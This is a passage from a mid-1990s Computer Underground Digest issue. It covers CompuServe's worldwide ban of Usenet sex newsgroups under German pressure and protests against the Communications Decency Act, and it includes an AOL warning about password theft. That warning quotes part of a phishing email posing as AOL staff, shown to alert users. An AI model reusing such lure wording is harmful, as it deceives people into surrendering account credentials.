gay-net.kontakte
gay-net.labern
gay-net.lederecke
gay-net.spiele
gay-net.test
rec.arts.erotica
shamash.gayjews
slo.sex
soc.support.youth.gay-lesbian-bi
t-netz.sex
t-netz.sex-stories
tw.bbs.sci.sex
ucb.erotica.sensual
uw.alt.sex.beastiality
uw.alt.sex.bestiality
uw.alt.sex.bondage
uw.alt.sex.stories
uw.alt.sex.stories.d
zer.t-netz.sex
------------------------------
Date: Sun, 31 Dec 1995 01:36:22 -0500 (EST)
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: File 4--Compuserve: Adam Dershowitz on Censorship
---------- Forwarded message begins here ----------
From--Adam Dershowitz <dersh@mit.edu>
Subject--Stop the Censorship!
Date--30 Dec 1995 23:51:35 GMT
Feel free to distribute or post the following letter where ever you see
fit:
Germany is setting the standards of free speech for the entire world,
and Compuserve is going along. This is the first major case of
censorship on the internet, and it is important that it is also the
last. The eyes of every internet provider, of the US Congress and other
governments are on this case to see how it develops.
German prosecutors threatened Compuserve for allowing access to Usenet
groups that they deemed to be unacceptable. Compuserve responded by
censoring it's users over the whole world, by banning these newsgroups.
If Germany tried to threaten a US phone company for allowing people to
use dirty words on an international phone call the phone company would
refuse to comply. Compuserve, given this same choice, chose to censor.
They have chosen to take responsibility for the content of everything
that crosses through their system, and to reject some of it.
One way to prevent such things from happening again is to make sure that
this censorship is not in the economic best interest of Compuserve, and
Germany. If they want to interfere with First Amendment rights, then we
should exercise our First Amendment rights to not communicate with them.
A boycott can be a very effective tool, that can work even if you are
not a Compuserve user. They have made a decision about community
standards for the world, if you agree that they do not have that right,
then do not accept their standards. If you are a Compuserve subscriber
then cancel your account.
Germany and Compuserve have chosen to selectively cut themselves off
from the rest of the internet community, let's make it a complete
separation. Do not send any E-mail to Compuserve or Germany. Do not
reply to any newsgroup posts, and do not access any of their web pages.
If you receive E-mail, then simply ignore it, send a copy of this
letter, or your own explanation that you will no longer use a system
that censors. If both Germany and Compuserve can be made into the
pariahs of the internet world then perhaps others will get the message
that censorship of the 'net is not acceptable and will only succeed in
destroying the 'net.
The World Wide Web should allow the exchange of any ideas around the
world. It should not be limited to the minimum acceptable ideas that
are allowed in any one of the countries or companies. If the
information that is available on the 'net is allowed to be only that
which is acceptable to people in Germany, Iran, Iraq, China and the US
Congress, then the net will be useless. If any one government, company
or entity, large or small, is allowed that much control of expression
then the freedom on the internet is lost to everyone.
Adam Dershowitz
dersh@mit.edu
218 Thorndike St
Apt 104 Cambridge MA 02141
------------------------------
Date: Sat, 30 Dec 1995 23:33:34 -0800 (PST)
From: Declan McCullagh <declan@EFF.ORG>
Subject: File 5--Compuserve: Brad Templeton on ClariNet censorship
>From Dave Farber's IP list. A good example of a sex panic on the part of
Compuserve -- banning newsgroups they don't even provide
-Declan
// declan@eff.org // My opinions are not in any way those of the EFF //
---------- Forwarded message ----------
To--Dave Farber <farber@central.cis.upenn.edu>
Date--Sat, 30 Dec 1995 15:38:27 -0800 (PST)
From--Brad Templeton <brad@alto.clari.net>
Alas, we were also pretty shocked to see some ClariNet e.news newsgroups
listed in the set that Compuserve announced it was banning from their
servers in fear of German censorship laws -- but mostly because Compuserve
isn't one of our subscribers, and they don't have any of our groups.
We've asked them why they listed them, and not yet heard back, but I
think this is actually a very good example of how capricious and dangerous
such laws are. They send people into panics, banning anything that
looks dangerous, even things they don't even have! If anybody needs a
lesson on why laws like the German laws (and the upcoming U.S. decency
act) have a chilling effect far beyond even their broad intent, this is it.
Had Compuserve carried our electronic newspaper newsgroups, banning these
ones would have been silly. Here are the "lurid" headlines from the last
few days of clari.news.sex, a newsgroup that contains only professional
reporting on sex-related issues
Vatican: Sex education not okay
Suspended Teacher To Return
Australian Govt Porn Committee Calls For Action
Beijing seizes one million porn, illegal books
Time for the annual best and worst lists
China customs crack down on pornography imports
CompuServe suspends online sex topics
CompuServe bans sex groups, sparking free-speech row
The most recent headlines from clari.news.gays as you can see are
equally non-lurid
Failed Robbery Led To Gay Slay
Killer To Sell Story
Gays In Military Judge Quits
Lesbian Wins Job Bias Suit
I wonder if the Germans thought this was worth banning or CIS made up
the list on their own. Either way, the the idea that anybody might,
in fear of such laws or under the orders of such laws, ban legitimate
professional (and entirely non-lurid) coverage of issues like these
is really scary, and we hope our many legitimate subsribers in Germany
don't fall prey to this. While the fact that CIS didn't actually have
our material makes this less interesting, a big part of the story is
that somebody was driven to remove stuff without even knowing what they
were removing.
------------------------------
Date: Mon, 1 Jan 1996 15:25:18 -0500 (EST)
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: File 6--WP: Germany Pulls the Shade On CompuServe, Internet
Attached are excerpts from today's article in the Washington Post.
Compuserve is weaseling, implying German law forced them to censor not
just alt.binaries.pictures.erotica.*, but text-only political discussion
groups. And the Christian Coalition is supporting them, of course.
"CompuServe must comply with the laws of the many countries in which
we operate," said CompuServe spokesman William Giles. "However, laws
in different countries are often in conflict, and this creates new
challenges unique to the emerging on-line industry."
"What CompuServe decided to do is a healthy thing," said Heidi
Stirrup, [The Christian Coalition's] director of government relations.
"I don't see that the Internet is going to be a lesser place" because
access to hard-core sexually explicit material has been reduced.
-Declan
------------------------------------------------------------------------
The Washington Post
January 1, 1996
Cyberporn Debate Goes International
Germany Pulls the Shade On CompuServe, Internet
By Kara Swisher
Washington Post Staff Writer
It's often been said that the Internet is a frontier where no one's
laws apply. But last week, on one portion of the global computer
network, German law took hold.
CompuServe Inc., one of the largest on-line service providers in the
United States, announced that it would temporarily ban access by all
its customers worldwide to some sexually oriented material on the
Internet in response to a request from prosecutors in Germany that the
material be banned there.
For technological reasons, CompuServe cannot block the access of just
its 220,000 customers in Germany.
"CompuServe must comply with the laws of the many countries in which
we operate," said CompuServe spokesman William Giles. "However, laws
in different countries are often in conflict, and this creates new
challenges unique to the emerging on-line industry."
The Christian Coalition, a church organization that has campaigned
against pornography on-line, praised the service's move.
"What CompuServe decided to do is a healthy thing," said Heidi
Stirrup, the coalition's director of government relations. "I don't
see that the Internet is going to be a lesser place" because access to
hard-core sexually explicit material has been reduced
How far the restrictions will spread remains unclear.
Margaret Ryan, a spokeswoman for America Online Inc., the Vienna
on-line service that also operates in Germany, said her Virginia-based
service had received no request to block the material to its German
customers. She would not comment on what the service would do if asked
to comply with such a demand. "We are investigating the situation,"
she said. "But we have no ban."
A spokesman for Microsoft Corp.'s Microsoft Network said it had
received no request either, but noted that its network had built-in
technology that allows parents to control what their children can
reach.
Both services said that unlike CompuServe, they have the technological
means to block just in Germany. That way, U.S. customers' access would
not be affected
The German government request is aimed at about 200 of the Internet's
15,000 newsgroups, which are message boards covering topics as diverse
as sailing, chess and the jokes of late-night TV show host David
Letterman.
The ones targeted by Germany in an ongoing investigation are sexually
graphic and explicit in nature and include child pornography in a
manner that German prosecutors consider illegal under their criminal
law.
If other countries follow Germany's lead, it could mean that on-line
services might have to create a different offering for each country or
only offer something to everyone that boils down to the lowest common
denominator
Questions of which rules apply have been debated for decades
concerning the print and broadcast media. "This is not unexpected,
this conflict of laws, because it has gone on for all important
emerging mediums," said Tony Rutkowski, executive director of the
Internet Society, the Alexandria-based advisory body involved with
Internet policy
------------------------------
Date: Sun, 31 Dec 1995 15:20:24 -0500
From: ZMacGordon@aol.com
Subject: File 7--Fwd: ALERT: Password Security
Below is the latest news from AOL. Old trick, old news, but people still
fall for it, eh?
---------------------
Forwarded message:
Subj: ALERT: Password Security
Date: 95-12-31 07:40:09 EST
From: Steve Case
To: ZMacGordon
Dear Friend of America Online,
I want to raise your awareness about an issue that affects us all: the
importance of never revealing your password.
Recently there have been a few incidents where computer hackers have tried to
gain access to passwords by soliciting individuals online. These hackers
have increased their level of sophistication so much that they have begun to
correspond in a style to make you believe they are representing America
Online. Here's an edited excerpt from a recent e-mail attempt:
"Dear AOL Community Member:
AOL is experiencing major problems. Due to a virus that was recently
loaded onto our main user database, containing most of our member
registration information, we are currently experiencing widespread system
failure. The problem originated when our system was illegally breached by a
former AOL employee.
We believe the employee, who is currently being questioned by authorities,
loaded a virus into our database. Because we identified the problem quickly,
we were able to stop the problem before the entire database was deleted.
The files that were deleted, however, happened to be the database link
files that link a user's password and screen name to the rest of their
account. We are currently working with McAfee Associates (Anti-Virus), to
replace the lost files
Some of the effects as a result of not having the database link files
include: random log-off's, AOLnet runs slower, and Email may accidentally be
deleted. These problems are MAJOR inconveniences to our users, so we need
your help to fix the problem."
The letter continues, outlining the steps you must take to keep your account
active, and awarding you free online hours for your troubles.
Sending e-mail is just one tactic. Another approach is by using IMs (Instant
Messages), where a hacker will notice you are online and try to pass himself
off as an employee. Hackers sometimes scan chat areas and the member
directory for screen names.
Simply put, your passwords are like items in your safety deposit box.
They're confidential. YOU are the only person who should know your
password. Giving someone (even unintentionally) your password -- especially
online -- is like handing over your wallet, keys, and other valuables to
complete strangers.
There is absolutely no reason why America Online would ever ask you for your
password! Be aware: NO EMPLOYEE OR REPRESENTATIVE OF AMERICA ONLINE WILL EVER
ASK YOU FOR YOUR PASSWORD, YOUR CREDIT CARD NUMBER, OR TO VERIFY YOUR BILLING
INFORMATION ONLINE. IF THEY DO, BE SUSPICIOUS AND TAKE ACTION--REPORT IT
IMMEDIATELY.
Here are some quick steps to keep your passwords secure:
1) Immediately change your passwords (at keyword PASSWORD) to at least 6
alphanumeric characters -- combination of letters and numbers -- for all of
your sub-accounts. Delete unused sub-accounts.
2) NEVER use your screen name, first or last name, town, street, etc. as a
password. Do not use a common word. Add a few digits to a word, or misspell
it. Hackers use all kinds of programs that search for common words.
3) Inform spouses, children, and others who have access to your account to
take the same safety measures, and to NEVER give out passwords.
4) Report suspicious behavior at keyword STAFFPAGER immediately.
Computer hacking on America Online is not widespread. But it's an activity
-- and an illegal act -- which hinders our ability to conduct business and
ensure a safe online community.
AOL will pursue all legal action and law enforcement protection within our
right to protect the security of our service.
We also rely on our members, partners, remote community leaders, and others
with overhead accounts much like a neighborhood watch program -- to help
crush hacking, to maintain confidentiality of the simplest personal belonging
(your password), and to report activity of this kind to AOL immediately.
If you have any questions, please discuss them with your contact at AOL.
Thank you, and have a Happy New Year.
Regards,
Steve Case
------------------------------
Date: Wed, 3 Jan 1996 12:46:00 -0800 (PST)
From: Declan McCullagh <declan@WELL.COM>
Subject: File 8--Reuters: Telecom Bill Nixed Until Budget Fixed
Earlier this afternoon, Reuters reported that Newt Gingrich says no
work will be done on the telecom bill until the budget mess is over:
In response to a question about whether the telecommunications
bill was on the table in talks with Senate leaders, Gingrich
said there will be ''nothing on the telecom bill until we
have a budget.''
------------------------------
Date: Mon, 1 Jan 1996 21:40:57 -0600 (CST)
From: David Smith <bladex@BGA.COM>
Subject: File 9--(fwd) Postcard to Briberspace (fwd)
---------- Forwarded message ----------
.. Tom Klemesrud
.. Cyberspace
.North Hollywood, CA 91601
..December 12, 1995
Congressman Howard Berman
Briberspace
Washington D.C.
FROM CYBERSPACE TO BRIBERSPACE
"Religion: The last refuge of scoundrels and politicians."
. -Mark Twain
I am taking this opportunity to write you from cyberspace in
vehement protest on this day--National Electronic Communications
Censorship Protest day.
Americans have fought and died for our guaranteed Constitutional
rights of freedom of speech, and now this Congress has decided
those sacrifices where made in vain--"we'll just wipe those away
we'll do it for the kids." The implication is--by some
perverse notion--that the kids will benefit with all americans'
free speech rights stripped away. Someone's gone nuts in
briberspace.
Congressman, if you were an active Internet user, you would know
that Exon and his cronies have mis-characterized the perils of
cyberspace. I have yet to find on thing obscene on the Net. If
cyberspace can't be free, and parents don't feel inclined to use
filtering technology or supervise their children, then the
Internet is not for those children--they are most likely lost
anyway through parental neglect. The Internet, or government,
should not and cannot take the place of parents and teachers. The
government cannot censor information content. You may know, we
already have laws against pornography and child abuse. You know
it, I know it, the American People know it. Don't think you're
going to get a extra vote from gutting the Constitution. You saw
the front page of yesterday's Los Angeles Times I hope. No
politician is going to spin this on into the "fighting
pornography" or "preventing Society's collapse." The people are
brighter that this and you know it--by the 30% approval rating
Congress got two days ago.
I asked Senator Exon's office for a couple URL addresses for what
was in his blue book, and the address did not exist. Perhaps the
Senator's staff put that stuff up? Did you ask him where he got
the smut he was shocking everybody with? Perhaps he got his
information from Martin Rimm--the one who embarrassed Senator
Grassley?
There are kids killing each other in the streets of California,
and you want to send the BBS Sysop to prison for 2 years for
running a BBS that can possibly free people from their
hopelessness; because they might see an "indecent" word like
"tits" on a computer BBS, or by some fluke of filtering
technology, glimpse a picture of a naked woman. I would have
hoped you efforts might have been a little less silly, and a
little more real-world productive--California kids are killing
each other in the streets, joining street gangs, engaged in
drive-by shootings, selling and using drugs. But perhaps, during
the course of these activities, they are not hearing "indecent"
words, or aren't exposed to a picture of a naked woman?
The priorities in briberspace are upside-down.
I am talking about your support for Senator Exon's Communications
Decency Act. There is nothing decent about this act--it is a
dark-ages political attempt at depriving your constituents of the
freedom of speech rights guaranteed them in the First Amendment
of the Constitution.
It amazes me how public servants in our secular government--with
its separation of church and state--can so easily embrace the
extremist political agenda of right wing religion zealots, hell
bend on lording-over speech and communications in the country,
like the Christian Coalition, and the Church of Scientology. I
can only hope you did it for the PAC money, for any other
motivations for supporting unconstitutional law that I can think
of, is far worse.
Thus, I coin the space you work in--the halls of Congress--as
"briberspace:" That space where seemingly corrupt politicians
snidely ignore the people they are supposed to represent, and
meet in smoke-filed back rooms with the scoundrel political
action committees, taking bribes in return for their powerful
vote.
Make no mistake: this IS the general scorn for Congress most
Americans feel. In a recent poll only 30% of the public
gave Congress an approval rating.
The People are afraid of politicians like you--uninspired,
unthinking politicians--who think they are Kings or Queens meant
to lord-over the People of the land, protecting them from the
evils of information and thoughts that aren't government
approved: Politicians who at every turn, take yet another stab at
trying to take away that which the People have left--of any
value--their freedoms.
President Clinton said, "I can't understand how People can say
they love their country and hate their government."
It is the scoundrels and politicians held in deep scorn that the
People cannot stomach--I puked last Sunday night watching a scene
from the Movie "The Distinguished Gentleman" as the Congressman
took a PAC bribe. (I just wanted to share that with you.) Yet,
the scoundrels and politicians seem to keep coming up with new
and innovative ways of stealing our liberty, at every turn, in
almost every back-room committee meeting. Is it some new version
of fascism we're trying to secretly install?
Please think again, before you vote on the Communications Decency
Act that attempts to unconstitutionally deprive Americans (only)
of their free speech rights, with its "indecent speech"
provisions. Government does not have the business trying to
regulate content in communications. And, I don't think your
going to be willing to build a communications wall around the
borders. Have you ever thought of off-shore Internet Service
Providers? Have you ever thought you might be destroying a
multi-billion dollar service industry that this country has the
lead in right now?
A recent A. C. Nielson survey found that there are now some 20
million americans now communicating on-line on the Internet. I
predict that if this draconian dark-ages legislative agenda
you've backed, is forwarded; these millions from cyberspace may
materialize into briberspace--like the million man march--to help
the scoundrels of the PAC's and politicians beholding to the PAC
scoundrels--see the light of the errors of their ways. And, if
they can't be shown the light, make them feel the heat.
You've offended a great many people with this proposed
legislation, and perhaps gotten some political gain with it--like
so many times before--from the ignorance of the unfortunate.
But, the People will ultimately not allow their communications to
be "dumbed-down" to a happy-face 5th grade level. They will
fight for their rights to speak and think freely.
The ACLU will immediately challenge your CDA. There is also
promised civil disobedience, in on instance, by a Texas judge to
protest the law. This law is a cruel joke that will backfire on
Congress. Please rethink it.
Please work to solve our real problems. Don't destroy the one
good think this country has. You won't be able to spin-doctor
this travesty of legislation to your political advantage.
. Sincerely yours,
. Tom Klemesrud
PS: You know I run a BBS with over 4,000 voters right in your
congressional district. Yet, we haven't heard that you have an E-mail
address. I'll be posting this letter to the public bulletin board
section.
------------------------------
Date: Sun, 16 Dec 1995 22:51:01 CDT
From: CuD Moderators <cudigest@sun.soci.niu.edu>
Subject: File 10--Cu Digest Header Info (unchanged since 16 Dec, 1995)
Cu-Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost electronically.
CuD is available as a Usenet newsgroup: comp.society.cu-digest
Or, to subscribe, send post with this in the "Subject:: line:
SUBSCRIBE CU-DIGEST
Send the message to: cu-digest-request@weber.ucsd.edu
DO NOT SEND SUBSCRIPTIONS TO THE MODERATORS.
The editors may be contacted by voice (815-753-0303), fax (815-753-6302)
or U.S. mail at: Jim Thomas, Department of Sociology, NIU, DeKalb, IL
60115, USA.
To UNSUB, send a one-line message: UNSUB CU-DIGEST
Send it to CU-DIGEST-REQUEST@WEBER.UCSD.EDU
(NOTE: The address you unsub must correspond to your From: line)
Issues of CuD can also be found in the Usenet comp.society.cu-digest
news group; on CompuServe in DL0 and DL4 of the IBMBBS SIG, DL1 of
LAWSIG, and DL1 of TELECOM; on GEnie in the PF*NPC RT
libraries and in the VIRUS/SECURITY library; from America Online in
the PC Telecom forum under "computing newsletters;"
On Delphi in the General Discussion database of the Internet SIG;
on RIPCO BBS (312) 528-5020 (and via Ripco on internet);
and on Rune Stone BBS (IIRGWHQ) (203) 832-8441.
CuD is also available via Fidonet File Request from
1:11/70; unlisted nodes and points welcome.
EUROPE: In BELGIUM: Virtual Access BBS: +32-69-844-019 (ringdown)
Brussels: STRATOMIC BBS +32-2-5383119 2:291/759@fidonet.org
In ITALY: ZERO! BBS: +39-11-6507540
In LUXEMBOURG: ComNet BBS: +352-466893
UNITED STATES: etext.archive.umich.edu (192.131.22.8) in /pub/CuD/
ftp.eff.org (192.88.144.4) in /pub/Publications/CuD/
aql.gatech.edu (128.61.10.53) in /pub/eff/cud/
world.std.com in /src/wuarchive/doc/EFF/Publications/CuD/
wuarchive.wustl.edu in /doc/EFF/Publications/CuD/
EUROPE: nic.funet.fi in pub/doc/cud/ (Finland)
ftp.warwick.ac.uk in pub/cud/ (United Kingdom)
The most recent issues of CuD can be obtained from the
Cu Digest WWW site at:
URL: http://www.soci.niu.edu/~cudigest/
COMPUTER UNDERGROUND DIGEST is an open forum dedicated to sharing
information among computerists and to the presentation and debate of
diverse views. CuD material may be reprinted for non-profit as long
as the source is cited. Authors hold a presumptive copyright, and
they should be contacted for reprint permission. It is assumed that
non-personal mail to the moderators may be reprinted unless otherwise
specified. Readers are encouraged to submit reasoned articles
relating to computer culture and communication. Articles are
preferred to short responses. Please avoid quoting previous posts
unless absolutely necessary.
DISCLAIMER: The views represented herein do not necessarily represent
the views of the moderators. Digest contributors assume all
responsibility for ensuring that articles submitted do not
violate copyright protections.
------------------------------
End of Computer Underground Digest #7.01
************************************
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #5, File #12 of 12
The End
Right now I am going to put issues 3, 4 and 5 into HTML, and they will
join 1 and 2 at http://hertz.njit.edu/~mrs3691. When I go back to school, I
plan on putting graphics on the page, and moving it to a better provider.
Issues 6 and beyond will hopefully go out on time, but a little reader input
would help. So if you have any thoughts on the zine, or hacking in general,
send them in. And wherever you hack, may the ethic be with you!
